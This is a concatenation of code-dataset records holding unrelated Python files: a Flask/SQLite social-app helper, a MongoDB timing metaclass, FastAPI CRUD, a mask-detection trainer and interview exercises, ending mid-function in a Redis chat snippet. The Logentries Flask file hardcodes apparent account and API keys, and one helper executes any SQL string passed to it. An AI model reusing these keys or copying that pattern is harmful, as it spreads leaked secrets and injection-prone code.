\"Test\",\n \"stateOrProvince\": \"wa\",\n \"streetAddress1\": \"Street1\",\n \"streetAddress2\": \"street2\",\n },\n \"returnShipping\": {\"carrierAccountNumber\": \"989ffff\", \"carrierName\": \"FedEx\"},\n \"storageAccountId\": \"/subscriptions/xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx/resourceGroups/myResourceGroup/providers/Microsoft.ClassicStorage/storageAccounts/test\",\n },\n },\n )\n print(response)\n\n\n# x-ms-original-file: specification/storageimportexport/resource-manager/Microsoft.ImportExport/preview/2021-01-01/examples/CreateExportJob.json\nif __name__ == \"__main__\":\n main()\n","sub_path":"sdk/storage/azure-mgmt-storageimportexport/generated_samples/create_export_job.py","file_name":"create_export_job.py","file_ext":"py","file_size_in_byte":2655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"461576756","text":"class Solution:\n def stringMatching(self, words: List[str]) -> List[str]:\n res = []\n words = sorted(words, key=len)\n for i, w in enumerate(words):\n for ot in words[i + 1:]:\n if w in ot:\n res.append(w)\n break\n return res\n","sub_path":"code/easy/string-matching-in-an-array.py","file_name":"string-matching-in-an-array.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"209649747","text":"import os\r\nimport cat_service\r\nimport subprocess\r\nimport platform\r\n\r\ndef main():\r\n '''\r\n Main method of project. It execute all other methods.\r\n :return:\r\n '''\r\n\r\n print_header()\r\n folder = get_output_folder()\r\n print('Found or created folder: ' + folder)\r\n download_cats(folder)\r\n display_cats(folder)\r\n\r\ndef print_header():\r\n\r\n print('==================================')\r\n print(' LOL cat app')\r\n print('==================================')\r\n\r\n\r\ndef get_output_folder():\r\n '''\r\n This method create a folder for .jpg files.\r\n :return: Path to folder.\r\n '''\r\n\r\n base_folder = os.path.dirname(__file__)\r\n folder = 'cat_pictures'\r\n full_path = os.path.join(base_folder, folder)\r\n\r\n if not os.path.exists(full_path) or not os.path.isdir(full_path):\r\n print('Creating new directory at {}'.format(full_path))\r\n os.mkdir(full_path)\r\n\r\n return full_path\r\n\r\n\r\ndef download_cats(folder):\r\n '''\r\n This method use 'cat_service' module to download .jpg files from website.\r\n :param folder: Path to the folder in which files will be stored.\r\n '''\r\n\r\n cat_counter = 8\r\n print('Contacting server to download cats...')\r\n\r\n for cat in range(1, cat_counter + 1):\r\n\r\n name = 'LOLcat number: {}'.format(cat)\r\n print('Downloading ' + name)\r\n cat_service.get_cat(folder, '')\r\n\r\n print('Done!')\r\n\r\n\r\ndef display_cats(folder):\r\n '''\r\n This method display .jpg files on all popular systems.\r\n :param folder: Path to folder with files.\r\n '''\r\n if platform.system() == 'Darwin':\r\n subprocess.call(['open', folder])\r\n elif platform.system() == 'Windows':\r\n subprocess.call(['start', folder])\r\n elif platform.system() == 'Linux':\r\n print('Displaying cats in OSX window.')\r\n subprocess.call(['xdg-open', folder])\r\n else:\r\n print(\"Sorry, We don't support your os: \" + platform.system())\r\n\r\nif __name__ == '__main__':\r\n main()","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"126459233","text":"# -*- coding:utf-8 -*-\n\nimport time\nfrom multiprocessing import Process\n\nargs = (1, 2, 3)\n\n\ndef func():\n time.sleep(5)\n for i in args:\n print(i)\n\n\np = Process()\np.start()\n# p.join()\ntime.sleep(0.1)\n\nprint('5555')","sub_path":"系统编程/002-multiprocessing.py","file_name":"002-multiprocessing.py","file_ext":"py","file_size_in_byte":225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"201303816","text":"import sqlite3\nfrom flask import g, jsonify\nimport unicodedata\n\ndef connect_db():\n return sqlite3.connect(\"database.db\")\n\ndef get_db():\n db = getattr(g, 'db', None)\n if db is None:\n db = g.db = connect_db()\n return db\n\ndef register_user(firstname, familyname, email, passw, gender, city, country):\n try:\n c = get_db()\n result = c.execute(\"insert into registered_users (firstname, familyname, email, password, gender, city, country, pageviews) values (?,?,?,?,?,?,?,0)\", [firstname,familyname,email,passw,gender,city,country])\n c.commit()\n return True\n except:\n return False\n\ndef login_user(email, password, token):\n c = get_db()\n result = c.execute(\"select * from registered_users where (email) = (?) AND (password) = (?)\", [email, password])\n result = result.fetchone()\n\n result2 = c.execute(\"select * from logged_in_users where (email) = (?)\", [email])\n #result2 = result2.fetchone()\n if (result is not None):\n c.execute(\"insert into logged_in_users (email, token) values (?,?)\", [email,token])\n c.commit()\n return True\n else:\n return False\n\ndef logout_user(token, email):\n c = get_db()\n stored_token = get_token(email)\n if (token == stored_token):\n c.execute(\"delete from logged_in_users where (token) = (?)\", [token])\n c.commit()\n return True\n else:\n return False\n\ndef get_token(email):\n try:\n c = get_db()\n print(\"asasdsadas har??\")\n result2 = c.execute(\"select token from logged_in_users where (email) = (?)\", [email])\n #result = c.execute(\"select token from logged_in_users WHERE (token) = (?)\", [token])\n result = result2.fetchone()[0]\n c.commit()\n return result\n except:\n return False\n\ndef delete_user(email):\n try:\n c = get_db()\n result = c.execute(\"delete from registered_users where (email) = (?)\", [email])\n c.commit()\n return True\n except:\n return False\n\ndef user_logged_in(token):\n try:\n c = get_db()\n result = c.execute(\"select * from logged_in_users where (token) = (?)\", [token])\n result = result.fetchone()[0]\n c.commit()\n\n if (result == None):\n return False\n return True\n except:\n return False\n\ndef token_to_email(token):\n try:\n c = get_db()\n result = c.execute(\"select * from logged_in_users where (token) = (?)\", [token])\n result = result.fetchone()[0]\n c.commit()\n\n if (result == None):\n return False\n return result\n except:\n return False\n\ndef user_exists(email):\n try:\n c = get_db()\n result = c.execute(\"select * from registered_users where (email) = (?)\", [email])\n result = result.fetchone()[0]\n c.commit()\n if (result == None):\n return False\n return True\n except:\n return False\n\ndef get_user_data(email):\n try:\n c = get_db()\n result = c.execute(\"select * from registered_users where (email) = (?)\", [email])\n result = result.fetchone()\n c.commit()\n if (result is not None):\n result = {\"firstname\" : result[0], \"familyname\" : result[1], \"email\" : result[2], \"gender\" : result[4], \"city\" : result[5], \"country\" : result[6], \"pageviews\" : result[7]}\n return result\n result = {}\n return result\n except:\n result = {}\n return result\n\ndef get_user_password(email):\n try:\n c = get_db()\n result = c.execute(\"select password from registered_users where (email) = (?)\", [email])\n result = result.fetchone()\n c.commit()\n if (result is not None):\n result = result[0]\n return result\n result = {}\n return result\n except:\n result = {}\n return result\n\ndef set_user_password(password, email):\n try:\n c = get_db()\n c.execute(\"update registered_users set password = (?) where email = (?)\", [password, email])\n c.commit()\n return True\n except:\n return False\n\ndef get_messages_by_email(token, email):\n try:\n c = get_db()\n rows = c.execute(\"select message, sender from messages where (email) = (?)\", [email])\n rows = rows.fetchall()\n\n result = []\n for row in range(len(rows)):\n message = \"\".join(rows[row][0])\n sender = \"\".join(rows[row][1])\n data = {'writer' : sender, 'content' : message}\n result.append(data)\n\n return result\n except:\n return False\n\ndef alter_table(command_string, parameter_array):\n try:\n c = get_db()\n result = c.execute(command_string, parameter_array)\n c.commit()\n return True\n except:\n return False\n\ndef post_message(email, sender, message):\n try:\n c = get_db()\n result = c.execute(\"INSERT INTO messages VALUES(?, ?, ?)\", [email, sender, message])\n c.commit()\n return True\n except:\n return False\n\ndef query_db(query, args=(), one=False):\n cur = get_db().execute(query, args)\n rv = cur.fetchall()\n cur.close()\n return (rv[0] if rv else None) if one else rv\n\ndef close_db():\n db = getattr(g, 'db', None)\n if db is not None:\n get_db().close()\n\ndef add_view(email):\n try:\n c = get_db()\n result = c.execute(\"UPDATE registered_users SET pageviews = pageviews + 1 WHERE (email) = (?)\", [email])\n c.commit()\n return True\n except:\n return False\n\ndef number_of_logged_in():\n try:\n c = get_db()\n result = c.execute(\"SELECT COUNT(*) FROM logged_in_users\")\n result2 = result.fetchone()\n return result2[0]\n except:\n return False\n\ndef number_of_messages():\n try:\n c = get_db()\n result = c.execute(\"SELECT COUNT(*) FROM messages\")\n result2 = result.fetchone()\n return result2[0]\n except:\n return False\n","sub_path":"Twidder/database_helper.py","file_name":"database_helper.py","file_ext":"py","file_size_in_byte":6016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"73299190","text":"\"\"\" Q 1.1: Test if a string has all unique characters. What if you can't use additional data structures? \"\"\"\n\n\"\"\" A: Using another data structure allows me to do this in O(N) time. I can sort the characters and check the adjacent characters to do this in O(N logN time)\"\"\"\n\ndef hasUniq(theInput):\n print (\"the Input is: \", theInput)\n sortedChars = ''.join(sorted(theInput))\n\n for i in xrange(len(sortedChars) - 1):\n if sortedChars[i] == sortedChars[i + 1]:\n print (\"the answer for this is false\")\n return False\n\n print (\"the answer for this is true\")\n return True\n\n# hasUniq(\"amitabh\")\n# hasUniq(\"amit\")\n# hasUniq(\"\")\n\n\"\"\" Feedback: This is good, given the constraint that you cannot use additional data structures.\nThe BEST way to do this is to use a FIXED SIZE ARRAY of size 256 (ascii alphabet size), and increment counters accordingly \"\"\"\n\n########################################################################################################################################\n\n\"\"\" Q 1.2 : Write a method to determine if one string is a permutation of another \"\"\"\n\"\"\" My Approach: decompose string into character array. If they consist of the same SET of characters, then it is true \"\"\"\ndef isPerm(in1, in2):\n print (\"our inputs are: \", in1, in2)\n if len(in1) != len(in2):\n print (\"the answer is false\")\n return False\n\n charSet = [0] * 26\n for i in xrange(len(in1)):\n char = in1[i]\n index = ord(char) - 97\n charSet[index] += 1\n for i in xrange(len(in2)):\n char = in2[i]\n index = ord(char) - 97\n charSet[index] = charSet[index] - 1\n if charSet[index] < 0:\n print (\"the answer is False\")\n return False\n print (\"the answer is true\")\n return True\n # subtract 97 from each character to get the required position in the array\n#print ord('a')\n\n#isPerm(\"abcdefg\", \"bacdgfe\")\n\n################################################################\n\n\"\"\"Q 1.5: One away - To edit a string, you can insert, remove, or replace a characterv\"\"\"\n\n\"\"\" First make sure the strings are <= 1 character length away from each other. Then loop through the shorter string and\ndelete whichever character is different from the longer string.\nOnce the strings are of the same length, change one character that's different and compare whether the lists are the same.\nIf yes, return true and if not return false\n\"\"\"\n\ndef isOneAway(str1, str2):\n print(\"the inputs are: \", str1, str2)\n if abs(len(str1) - len(str2)) > 1:\n print (\"one string is at least 2 chars greater than the other\")\n return False\n in1 = list(str1)\n in2 = list(str2)\n\n if( len(in1) < len(in2) ):\n for i in xrange(len(in1)):\n if in1[i] != in2[i]:\n in2.pop(i)\n break\n elif( len(in2) < len(in1) ):\n #print (in2, \" is shorter than \", in1)\n for i in xrange(len(in2)):\n if in1[i] != in2[i]:\n in1.pop(i)\n #print in1\n #print in2\n break\n\n # remove the last character if the character lengths are not the same\n if len(in1) > len(in2):\n in1.pop()\n if len(in2) > len(in1):\n in2.pop()\n # now the lists should be of the same length\n for i in xrange(len(in1)):\n if in1[i] != in2[i]:\n in2[i] = in1[i]\n break\n in1.sort()\n in2.sort()\n print (in1 == in2)\n return in1 == in2\n\nisOneAway(\"pale\", \"ple\") # should return true (remove a)\nisOneAway(\"pales\", \"pale\") # true\nisOneAway(\"pale\", \"bale\") # true\nisOneAway(\"pale\", \"bake\") # false\n####################################################\n\n\"\"\" Q 1.6: Compress aabcccccaaa to a2b1c5a3. If the compressed string is longer, return the original string \"\"\"\n\ndef stringCompress(theInput):\n if len(theInput) == 0:\n return None\n count = 0\n currentChar = theInput[0]\n answer = \"\"\n for character in theInput:\n if (character == currentChar):\n count += 1\n else:\n answer = answer + str(currentChar) + str(count)\n currentChar = character\n count = 1\n answer = answer + str(currentChar) + str(count)\n if len(answer) <= len(theInput):\n print (answer)\n return answer\n print (theInput)\n return theInput\n\n# stringCompress(\"aabcccccaaa\")\n\n##########################################################\n","sub_path":"Chapter1.py","file_name":"Chapter1.py","file_ext":"py","file_size_in_byte":4435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"263183875","text":"# Anja Mühr\n# Aug 2019\n\nimport math\nfrom SequenceList import SequenceList\n\n\nclass SequenceClassifier:\n\n def __init__(self, csvFile):\n \"\"\" constructor \"\"\"\n self.csvFile = csvFile\n self.odds = SequenceList('odds.csv')\n self.evens = SequenceList('evens.csv')\n self.fibs = SequenceList('fibs.csv')\n self.nats = SequenceList('nats.csv')\n self.errors = SequenceList('errors.csv')\n\n def run(self):\n \"\"\" Opens csv file, reads line by line, classifying each line, then saves lists of each sequence to csv. \"\"\"\n\n file = open(self.csvFile, 'r')\n\n # read file line by line\n line = file.readline()\n while line:\n # remove \\n and blank spaces at end of line\n line = line.rstrip()\n # separate into numbers list if line is not empty\n if (line != \"\"):\n linearr = line.split(',')\n # classify sequence\n self.classify_sequence(linearr)\n line = file.readline()\n\n file.close()\n\n # save results to csv\n self.odds.toFile()\n self.evens.toFile()\n self.fibs.toFile()\n self.nats.toFile()\n self.errors.toFile()\n\n def is_int(self, no):\n \"\"\" checks if a string is an integer \"\"\"\n try:\n int(no)\n return True\n except ValueError:\n return False\n\n def is_odd_even(self,odd_even, linearr):\n \"\"\" check if a sequence is odd or even => parameter oddEven must be 0 for even and 1 for odd \"\"\"\n prev = 0\n count = 0\n for current in linearr:\n # check if current is an integer (necessary for valid sequence)\n if (not self.is_int(current)):\n return False\n current = int(current)\n # check if number is odd/even (oddEven = 0 for even and 1 for odd)\n if (current % 2 != odd_even):\n # return false if not\n return False\n if (count > 0):\n # check if odd/even numbers are in sequence\n if (prev + 2 != current):\n # return false if not\n return False\n prev = current\n count = count +1\n # if false has not been returned after checking seq, must be true\n return True\n\n def is_nat(self,linearr):\n \"\"\" checks if a sequence is of natural numbers \"\"\"\n prev = 0\n count = 0\n for current in linearr:\n # check if current is an integer (necessary for valid sequence)\n if (not self.is_int(current)):\n return False\n current = int(current)\n if (count > 0):\n # check if numbers are in sequence\n if (prev + 1 != current):\n # return false if not\n return False\n prev = current\n count = count+1\n # if false has not been returned after checking seq, must be true\n return True\n\n def is_fib(self,linearr):\n \"\"\" Check if a sequence belongs to fibanacci seq starting with 1,1,2,3,5,8.... \"\"\"\n\n def is_fib_no(no):\n \"\"\" A number belongs to the fibonacci sequence if (5*n^2 + 4) or (5*n^2 – 4) is a perfect square \"\"\"\n # https://en.wikipedia.org/wiki/Fibonacci_number#Sequence_properties\n\n def perfect_square(no):\n \"\"\" checks if a number is a perfect square \"\"\"\n if (no < 0):\n return False\n test = int(math.sqrt(no))\n return test*test == no\n\n return perfect_square((5*no*no + 4)) or perfect_square((5*no*no - 4))\n\n prev = 0\n prevprev = 0\n count = 0\n\n for current in linearr:\n # check if current is an integer (necessary for valid sequence)\n if (not self.is_int(current)):\n return False\n current = int(current)\n # check if first 2 numbers belong to fib Sequence\n if (count < 2):\n #p = 1\n if (not is_fib_no(current)):\n # if not, return false\n return False\n else:\n # check fib requirement\n if (prevprev + prev != current):\n # return false if untrue\n return False\n prevprev = prev\n prev = current\n count = count+1\n # if false has not been returned after checking seq, must be true\n return True\n\n def classify_sequence(self,linearr):\n \"\"\" classifies a sequence as fibonacci, odd, even or natural, or as an error \"\"\"\n\n # check if fibonacci sequence\n if (self.is_fib(linearr)):\n # fibonacci sequence, thus save to fibs object\n self.fibs.add(linearr)\n\n # check if even sequence\n elif (self.is_odd_even(0, linearr)):\n # even sequence, thus save to evens object\n self.evens.add(linearr)\n\n # check if odd sequence\n elif (self.is_odd_even(1, linearr)):\n # odd sequence, thus save to odds object\n self.odds.add(linearr)\n\n # check if natural sequence\n elif (self.is_nat(linearr)):\n # natural sequence, thus save to nats object\n self.nats.add(linearr)\n\n # if none of these, incorrect input so save in error object\n else:\n self.errors.add(linearr)\n","sub_path":"SequenceClassifier.py","file_name":"SequenceClassifier.py","file_ext":"py","file_size_in_byte":5513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"139432275","text":"\"\"\"\n database.py\n Contains interactions for the HP Norton Mongodb database.\n\n Functionality:\n HP Norton customer: see a list of all products available for rent\n HP Norton salesperson: see a list of all of the different products, showing product ID,\n description, product type and quantity available.\n HP Norton salesperson: see a list of the names and contact details\n (address, phone number and email) of all customers who have rented a certain product.\n\n Includes timing functionality to all methods\n\"\"\"\nimport logging\nimport csv\nimport time\nfrom pymongo import MongoClient\n\n# File logging setup\nLOG_FILE = 'HP.log'\nFILE_LOG_FORMAT = \"%(asctime)s %(filename)s:%(lineno)-4d %(levelname)s %(message)s\"\nFILE_FORMATTER = logging.Formatter(FILE_LOG_FORMAT)\nFILE_HANDLER = logging.FileHandler(LOG_FILE, mode=\"w\")\nFILE_HANDLER.setLevel(logging.INFO)\nFILE_HANDLER.setFormatter(FILE_FORMATTER)\n\n# Console logging setup\nCONSOLE_LOG_FORMAT = \"%(filename)s:%(lineno)-4d %(message)s\"\nCONSOLE_FORMATTER = logging.Formatter(CONSOLE_LOG_FORMAT)\nCONSOLE_HANDLER = logging.StreamHandler()\nCONSOLE_HANDLER.setLevel(logging.DEBUG)\nCONSOLE_HANDLER.setFormatter(CONSOLE_FORMATTER)\n\nLOGGER = logging.getLogger()\nLOGGER.setLevel(logging.ERROR)\nLOGGER.addHandler(FILE_HANDLER)\nLOGGER.addHandler(CONSOLE_HANDLER)\n\n\nclass TimeMeta(type):\n \"\"\"Metaclass to enable timing of functions\"\"\"\n @staticmethod\n def time_factory(func):\n def time_func(*args, **kwargs):\n start = time.time()\n output = func(*args, **kwargs)\n end = time.time() - start\n print('Time to run {}: {}\\n'.format(func.__name__, end))\n return output\n return time_func\n\n def __new__(cls, clsname, bases, _dict):\n time_functions = {}\n for name, val in _dict.items():\n if not name.startswith('__'):\n time_functions[name + '_timeing'] = TimeMeta.time_factory(val)\n time_functions[name] = val\n else:\n time_functions[name] = val\n\n return super().__new__(cls, clsname, bases, time_functions)\n\n\nclass MongoDBConnection():\n \"\"\"MongoDB Connection\"\"\"\n\n def __init__(self, host='127.0.0.1', port=27017):\n \"\"\" be sure to use the ip address not name for local windows\"\"\"\n self.host = host\n self.port = port\n self.connection = None\n\n def __enter__(self):\n self.connection = MongoClient(self.host, self.port)\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.connection.close()\n\n\nclass MongoDBFunctions(metaclass=TimeMeta):\n\n def import_data(self, directory_name, product_file, customer_file, rentals_file):\n \"\"\"\n This function takes a directory name three csv files as input, one with product data, one with\n customer data and the third one with rentals data and creates and populates a new MongoDB\n database with these data. It returns 2 tuples: the first with a record count of the number of\n products, customers and rentals added (in that order), the second with a count of any errors\n that occurred, in the same order.\n\n :return: tuple1, record count of the # of products, customers, rentals added\n tuple2, count of any errors that occurred, in the same order\n \"\"\"\n logging.info('--------Importing datafiles in %s', directory_name)\n count_list = []\n error_list = []\n files = (product_file, customer_file, rentals_file)\n\n # Open connection\n logging.info('Opening connection to mongodb.')\n mongo = MongoDBConnection()\n logging.info('Connection open.')\n\n with mongo:\n # Create connection to database\n logging.info('Attempting to connect to mongodb: HPNortonDatabase in local')\n hp_db = mongo.connection.HPNortonDatabase\n logging.info('Connected HPNortonDatabase.')\n\n # create/connect to collections\n logging.info('Connecting to collections...')\n product_data = hp_db['product_data']\n logging.info('*connected to collection: product_data')\n customer_data = hp_db['customer_data']\n logging.info('*connected to collection: customer_data')\n rental_data = hp_db['rental_data']\n logging.info('*connected to collection: rental_data')\n collections = (product_data, customer_data, rental_data)\n\n # load data\n for file, collection in zip(files, collections):\n logging.info('Attempting to open: %s', file)\n with open(directory_name + '/' + file) as curr_f:\n logging.info('File opened.')\n reader = csv.DictReader(curr_f)\n logging.debug('Created reader to process file.')\n data = []\n for row in reader:\n logging.debug('Adding to data list %s', row)\n data.append(row)\n logging.debug('Data added to list.')\n\n try:\n collection.insert_many(data)\n count_list.append(data.__len__())\n logging.info('File data loaded.')\n except TypeError as error: # may need to figure out how to accommodate more errors...\n logging.info('Error %s: ', error)\n error_list.append(error)\n\n logging.info('--------All data import complete.')\n # Outputs\n tuple1 = tuple(count_list)\n tuple2 = tuple(error_list)\n\n return tuple1, tuple2\n\n def show_available_products(self):\n \"\"\"\n Returns a Python dictionary of products listed as available with the following fields:\n product_id\n description\n product_type\n quantity_available\n \"\"\"\n\n # Open connection\n logging.info('--------Showing available products in HPNortonDatabase')\n logging.info('Opening connection to mongodb.')\n mongo = MongoDBConnection()\n logging.info('Connection open.')\n\n output_dict = {}\n\n with mongo:\n # Create connection to database\n logging.info('Attempting to connect to mongodb: HPNortonDatabase in local')\n hp_db = mongo.connection.HPNortonDatabase\n logging.info('Connected HPNortonDatabase.')\n\n # Query database\n logging.debug('Attempting to connect to collection: product_data')\n products = hp_db['product_data']\n logging.debug('Connected to collection.')\n\n logging.info('Querying product collection and adding products to output_dict.')\n for product in products.find():\n logging.debug('Adding product to output_dict: %s', product['product_id'])\n prod_str = f\"prod{product['product_id']}\"\n product.pop('_id')\n output_dict[prod_str] = product\n logging.debug('Product added.')\n logging.info('Output dictionary created.')\n\n return output_dict\n\n def show_rentals(self, product_id):\n \"\"\"\n Returns a Python dictionary with the following user information from users that have rented\n products matching product_id:\n user_id\n name\n address\n phone_number\n email\n \"\"\"\n # Open connection\n logging.info('--------Searching HPNortonDatabase for rentals of product: %s', product_id)\n logging.info('Opening connection to mongodb.')\n mongo = MongoDBConnection()\n logging.info('Connection open.')\n\n output_dict = {}\n\n with mongo:\n # Create connection to database\n logging.info('Attempting to connect to mongodb: HPNortonDatabase in local')\n hp_db = mongo.connection.HPNortonDatabase\n logging.info('Connected HPNortonDatabase.')\n\n rental_data = hp_db['rental_data']\n customer_data = hp_db['customer_data']\n\n for rental in rental_data.find({'product_id': product_id}):\n rental_str = f\"rental_{rental['rental_id']}\"\n customer = customer_data.find_one({'customer_id': rental['customer_id']})\n customer.pop('_id')\n output_dict[rental_str] = customer\n\n return output_dict\n\n\ndef main():\n \"\"\"Used for testing purposes.\"\"\"\n directory_path = 'C:/Users/USer/Documents/UW_Python_Certificate/Course_2/' \\\n 'SP_Python220B_2019/students/franjaku/lesson10/data_files'\n mongo_funcs = MongoDBFunctions()\n with open('timings.txt', 'w+') as fl:\n fl.write('-----------------------------\\n')\n fl.write('With 4 records per file.\\n')\n mongo_funcs.import_data_timeing(directory_path, 'product_data.csv', 'customer_data.csv',\n 'rental_data.csv')\n output_rentals = mongo_funcs.show_rentals_timeing('1')\n fl.write('Number of rentals found: {}\\n'.format(len(output_rentals)))\n output_products = mongo_funcs.show_available_products_timeing()\n fl.write('Number of products found: {}\\n'.format(len(output_products)))\n\n fl.write('-----------------------------')\n fl.write('With 100 records per file.\\n')\n mongo_funcs.import_data_timeing(directory_path, 'product_data_100.csv', 'customer_data_100.csv',\n 'rental_data_100.csv')\n output_rentals = mongo_funcs.show_rentals_timeing('1')\n fl.write('Number of rentals found: {}\\n'.format(len(output_rentals)))\n output_products = mongo_funcs.show_available_products_timeing()\n fl.write('Number of products found: {}\\n'.format(len(output_products)))\n\n fl.write('-----------------------------')\n fl.write('With 10000 rental records.\\n')\n mongo_funcs.import_data_timeing(directory_path, 'product_data_100.csv', 'customer_data_100.csv',\n 'rental_data_10000.csv')\n output_rentals = mongo_funcs.show_rentals_timeing('1')\n fl.write('Number of rentals found: {}\\n'.format(len(output_rentals)))\n output_products = mongo_funcs.show_available_products_timeing()\n fl.write('Number of products found: {}\\n'.format(len(output_products)))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"students/franjaku/lesson10/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":10462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"517244480","text":"import json\nimport os\nfrom logentriesAPI import api as api\n\nfrom flask import Flask, render_template, request\n\n# Flask app should start in global layout\napp = Flask(__name__)\n\n\n@app.route('/logentries', methods=['POST'])\ndef logentries():\n req = request.get_json(silent=True, force=True)\n\n print(\"Request:\")\n print(json.dumps(req, indent=4))\n\n return req\n\n\n@app.route('/logentries', methods=['GET'])\ndef logentries_get_logs():\n # req = request.get_json(silent=True, force=True)\n\n # print(\"Request:\")\n\n api.ACCOUNT_KEY = \"f03c6814-64e7-4183-8d30-08034a6cee97\"\n api.API_KEY = \"0e57d0ea-5e8e-4955-922a-ee6e2dbd9a76\"\n\n api.get_logs()\n #\n # FROM_TS = datetime.date(2017, 10, 26)\n # TO_TS = datetime.date(2017, 10, 27)\n #\n # #a = datetime.datetime.strftime(FROM_TS, \"DD.%MM.%YY\")\n #\n # api.HOST_NAME = \"portal-prod\"\n #\n # api.SAVE_FILE = \"result\"\n #\n # api.LOGENTRIES_API_URL\n #\n # # api.do_search(FROM_TS, TO_TS)\n #\n # # Read/Write\n # # --api-key e4bececc-d1b4-449e-a949-2b6b7c5e0074\n # # Read Only\n # # --api-key 0e57d0ea-5e8e-4955-922a-ee6e2dbd9a76\n #\n # # --account-key f03c6814-64e7-4183-8d30-08034a6cee97\n # # --from-date 26.11.2017\n # # --to-date 27.11.2017\n # # --host-name portal-prod\n #\n # return \"

Patrick

\"\n\n\nif __name__ == '__main__':\n port = int(os.getenv('PORT', 5000))\n\n print(\"Starting app on port %d\" % port)\n\n app.run(debug=False, port=port, host='0.0.0.0')\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"565281966","text":"#Import library for model training \nimport tensorflow as tf\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nfrom tensorflow.keras.applications.mobilenet_v2 import MobileNetV2\nfrom tensorflow.keras.layers import Dense, Dropout, Activation, Flatten, GlobalAveragePooling2D\nfrom tensorflow.keras.optimizers import Adam\nprint(tf.__version__)\ntf.test.gpu_device_name()\n\n#Data images processing\nimg_generator = ImageDataGenerator(rescale = 1 / 255.0,\n zoom_range = 0.1,\n width_shift_range = 0.1,\n height_shift_range = 0.1,\n shear_range = 0.2,\n horizontal_flip = True,\n fill_mode = 'nearest')\n\ntrain = img_generator.flow_from_directory('/Users/faimonsterz/Development/Project-MaskDetection/dataset', \n target_size = (224, 224),\n classes = ['with_mask','without_mask'],\n class_mode = 'categorical', \n batch_size = 64, \n shuffle = True)\n\n#Model design\nbased_model = MobileNetV2(weights = 'imagenet',\n include_top = False,\n input_shape = (224, 224, 3))\nbased_model.trainable = False\n\nmodel = Sequential()\nmodel.add(based_model)\nmodel.add(GlobalAveragePooling2D())\nmodel.add(Flatten())\nmodel.add(Dense(128))\nmodel.add(Activation('relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(64))\nmodel.add(Activation('relu'))\nmodel.add(Dropout(0.3))\nmodel.add(Dense(2))\nmodel.add(Activation('softmax'))\nmodel.summary()\n\n#Model optimizer\nopt = Adam(lr = 0.001, decay = 0.001 / 20)\nmodel.compile(loss = 'binary_crossentropy', optimizer = opt, metrics = ['accuracy']) \n\n#Model traning\nmodel.fit(train, batch_size = 64, epochs = 10)\n\n\n","sub_path":"train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":2035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"217492236","text":"from fastapi import FastAPI, Depends\nfrom sqlalchemy.orm import Session\nfrom starlette.responses import Response\nfrom dao import ProductDAO, CategoryDAO\nfrom database import Base, engine, SessionLocal\nfrom schemas import *\napp = FastAPI()\n\nBase.metadata.create_all(bind=engine)\n\ndef get_db():\n db = SessionLocal()\n try:\n yield db\n finally:\n db.close()\n\n@app.get(\"/\")\nasync def root():\n return {\"message\": \"Hello Olist !!!\"}\n\n# CRUD PRODUTOS\n@app.post(\"/product/\")\nasync def create_product(product: ProductCreate, db: Session = Depends(get_db)):\n return ProductDAO().create(db=db, product=product)\n \n@app.get(\"/products/\")\nasync def get_products(db: Session = Depends(get_db)):\n return ProductDAO().read(db=db)\n\n@app.get(\"/product/\")\nasync def get_product_by(\n db: Session = Depends(get_db), \n name: str = \"\", \n description: str = \"\",\n value: float = 0,\n categories_id: int = 0\n):\n filters = {}\n if name: \n filters[\"name\"] = name\n if description: \n filters[\"description\"] = description\n if value:\n filters[\"value\"] = value\n if categories_id:\n filters[\"categories_id\"] = categories_id\n\n return ProductDAO().read_by(db=db, filters=filters)\n\n@app.put(\"/product/{product_id}\")\nasync def update_product(product_id: int, product: ProductUpdate, db: Session = Depends(get_db)):\n return ProductDAO().update(db=db, product=product, id=product_id)\n\n@app.delete(\"/product/{product_id}\")\nasync def delete_product(product_id : int, db: Session = Depends(get_db)):\n return ProductDAO().delete(db=db, id=product_id)\n\n@app.get(\"/category/file\")\nasync def create_category_from_file(db: Session = Depends(get_db)):\n file = \"../categorias.csv\"\n return CategoryDAO().create_from_csv(db=db, file=file)\n\n@app.get(\"/categories/\")\nasync def get_product_by(db: Session = Depends(get_db)):\n return CategoryDAO().read(db=db)\n \n\n\n","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"230042207","text":"import redis\nimport time\nimport json\nfrom Unit6 import DistributedLock\n\npool = redis.ConnectionPool(host='localhost', port=6379, decode_responses=True)\nconn = redis.Redis(connection_pool=pool)\n\n\ndef create_chat(sender, recipients, message, chat_id=None):\n \"\"\" 创建群组\n @param string sender: 发送者\n @param map|list recipients: 接收者\n @param string message: 消息\n @param int chat_id: 群号\n @return:\n \"\"\"\n\n chat_id = chat_id or str(conn.incr('ids:chat:'))\n recipients.append(sender)\n recipientsd = dict((r, 0) for r in recipients)\n pipe = conn.pipeline()\n 